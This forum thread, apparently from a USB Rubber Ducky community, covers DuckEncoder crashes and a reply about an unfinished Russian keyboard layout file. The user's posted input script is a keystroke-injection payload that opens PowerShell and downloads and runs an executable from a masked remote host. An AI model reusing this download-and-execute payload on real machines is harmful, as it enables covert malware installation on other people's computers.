Jump to content

[BugReport] Troubles with Encoder


alexx

Recommended Posts

hi can't solve this problem with encoder 2.2 , 1.2

Microsoft Windows [Version 6.2.9200]

C:\Users\for\Desktop\rubberD\DuckEncoder_v2.2>java -jar encoder.jar -i script.tx
t
Error with input file!
Exception in thread "main" java.lang.NullPointerException
        at Encoder.main(Encoder.java:107)

C:\Users\for\Desktop\rubberD\DuckEncoder_v2.2>java -jar encoder.jar -i script.tx
t -o inject.bin -l ru
Error with input file!
Exception in thread "main" java.lang.NullPointerException
        at Encoder.main(Encoder.java:107)


C:\Users\for\Desktop\rubberD\DuckEncoder_v2.2>
input file:
DELAY 2000
GUI r
DELAY 100
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://****.ru/notepad.exe','%TEMP%\notepad.exe'); Start-Process "%TEMP%\notepad.exe"
ENTER
Trying to use online decoder & have troubles too.
Edited by midnitesnake
Corrected Formatting
Link to comment
Share on other sites

Make sure there are no spaces at the end of the line.

I get, the following:

Char not found:ASCII_72
Char not found:ASCII_70
Char not found:ASCII_6F
Char not found:ASCII_77
Char not found:ASCII_65
Char not found:ASCII_72
Char not found:ASCII_73
Char not found:ASCII_68
Char not found:ASCII_65

This is because the ru.properties file is not finished, its just a start. Like the Italian keyboard post, you need to help build a working ru.properties file

Link to comment
Share on other sites

in 1.2 version:

C:\Program Files\Atmel\Flip 3.4.2\bin>java -jar duckencode.jar -i script.txt -o
inject.bin
Error with input file!
Exception in thread "main" java.lang.reflect.InvocationTargetException
        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
        at sun.reflect.NativeMethodAccessorImpl.invoke(Unknown Source)
        at sun.reflect.DelegatingMethodAccessorImpl.invoke(Unknown Source)
        at java.lang.reflect.Method.invoke(Unknown Source)
        at org.eclipse.jdt.internal.jarinjarloader.JarRsrcLoader.main(JarRsrcLoa
der.java:58)
Caused by: java.lang.NullPointerException
        at Encoder.main(Encoder.java:111)
        ... 5 more

C:\Program Files\Atmel\Flip 3.4.2\bin>
with the same input file, -L not used
no spaces at the end, file fully correct
Edited by midnitesnake
Corrected Formatting
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...